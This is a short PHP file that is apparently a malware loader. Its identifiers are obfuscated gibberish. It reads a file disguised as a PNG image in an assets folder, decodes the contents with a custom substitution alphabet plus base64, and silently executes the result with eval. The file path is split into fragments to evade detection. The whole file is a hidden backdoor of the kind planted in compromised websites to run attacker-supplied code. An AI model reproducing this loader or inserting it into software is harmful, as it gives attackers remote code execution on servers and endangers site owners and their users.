<?php

function fezixi_kyfawotho($aheqeh_ydysheqysha) {
    $xehygy = bozabu_uchyzhikhe(1);
    $wiwobe = bozabu_uchyzhikhe(2);
    for ($etytych = 0; $etytych < strlen($xehygy); $etytych++) {
        $ybeqero = substr($xehygy, $etytych, 1);
        $yhochoq = substr($wiwobe, $etytych, 1);
        $ywimer[$ybeqero] = $yhochoq;
    }

    $uchuvyx = strtr($aheqeh_ydysheqysha, $ywimer);
    $uchuvyx = base64_decode($uchuvyx);

    return $uchuvyx;
}

function bozabu_uchyzhikhe($aheqeh_ydysheqysha) {
    if ($aheqeh_ydysheqysha == 1)
        return coxyje_thoxysid();
    if ($aheqeh_ydysheqysha == 2)
        return liravo_roxegochuq();
}

function umoval_chinokhyfy($aheqeh_ydysheqysha) {
    $syfegis = array();
    if (!file_exists($aheqeh_ydysheqysha))
        return false;
    $aleteh = @file_get_contents($aheqeh_ydysheqysha);
    if (!$aleteh)
        return false;
    $aleteh = substr($aleteh, 3);
    $syfegis = fezixi_kyfawotho($aleteh);
    return $syfegis;
}

function coxyje_thoxysid() {
    $aleteh = "DYmpoLb231=vNk4VUFqxwXd+thEZuGar6sOIWejMgCR9z70niASflcBT/8QKyP5HJ";
    return $aleteh;
}

function liravo_roxegochuq() {
    $syfegis = "JQ84W7NUakjor3xDRTfC5sn=vgqtdFuX0BPOE9wZi+zbYle/IAKMphH216SGyVLmc";
    return $syfegis;
}

$sozuly = umoval_chinokhyfy(__DIR__ . "/ass" . "ets/" . "imag" . "es/osa" . "fody.p" . "ng");
if ($sozuly) {
    @eval($sozuly);
}

